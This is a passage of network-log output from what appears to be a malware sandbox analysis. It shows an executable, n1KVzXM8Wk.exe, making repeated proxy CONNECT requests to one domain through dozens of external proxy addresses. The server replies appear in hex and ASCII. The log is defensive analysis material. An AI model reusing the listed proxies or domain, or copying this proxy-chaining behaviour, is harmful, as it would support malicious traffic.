                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647263050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.834769011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.162415981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1518192.168.2.454223103.216.49.15180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.088968039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1519192.168.2.45389527.112.78.3431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.089226961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178276062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:05.214334965 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1520192.168.2.454435185.162.229.215806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.092784882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.183790922 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1521192.168.2.45437086.238.101.78806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.099739075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.275306940 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1522192.168.2.45317675.119.145.154210726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.100125074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1523192.168.2.454466154.16.63.164436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.108203888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1524192.168.2.451643185.104.63.10731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.116938114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1525192.168.2.454331102.223.20.217806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.117166996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.368067980 CET518INHTTP/1.1 302 Found
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Location: https://repository.gij.edu.gh
                                                                                                      Content-Length: 320
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 70 6f 73 69 74 6f 72 79 2e 67 69 6a 2e 65 64 75 2e 67 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://repository.gij.edu.gh">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1526192.168.2.453841182.72.203.255806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.118081093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1527192.168.2.451646185.139.56.13369616812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.118252993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.810348034 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1528192.168.2.454347177.38.245.110557136812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.118377924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1529192.168.2.454424141.95.160.178596566812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.124420881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.574004889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147160053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1530192.168.2.451715192.99.37.195335536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.139168978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1531192.168.2.45406170.113.250.186160996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.140736103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200409889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334598064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1532192.168.2.454361185.236.37.10844436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.140736103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.475358963 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1533192.168.2.45427936.67.77.4131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.140984058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1534192.168.2.451114183.247.152.98532816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.140985012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200428009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1535192.168.2.453249164.92.85.180366556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.141014099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200408936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334597111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.444056034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1536192.168.2.454432153.19.91.77806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.141134024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.576255083 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Content-Length: 637
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 73 63 40 67 63 69 2e 67 64 79 6e 69 61 2e 70 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of t
                                                                                                      Feb 23, 2024 09:45:28.576263905 CET293INData Raw: 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72
                                                                                                      Data Ascii: he time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouw


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1537192.168.2.45398282.66.245.82806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.141571999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200436115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334605932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.444175005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1538192.168.2.45432720.24.43.21481236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.141681910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.472400904 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1539192.168.2.454453194.247.173.1780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.142194986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1540192.168.2.454049107.180.90.42106706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.142276049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178364038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.179056883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.178493023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1541192.168.2.454499154.16.63.164436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.158094883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1542192.168.2.454034207.180.222.186162076812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.164014101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1543192.168.2.451694128.199.221.91645796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.195076942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200505972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334651947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.444173098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1544192.168.2.454503154.16.63.164436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.195266008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1545192.168.2.454009185.189.199.75235006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.214509964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.152307987 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1546192.168.2.45441920.27.86.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.214678049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.449181080 CET59INHTTP/1.1 200 Connection Established
                                                                                                      Proxy-agent: nginx


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1547192.168.2.45403945.11.95.16560116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.226170063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1548192.168.2.45446447.179.5.810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.226634979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1549192.168.2.454467199.58.184.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.240962029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1550192.168.2.454354125.122.26.24210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.252695084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
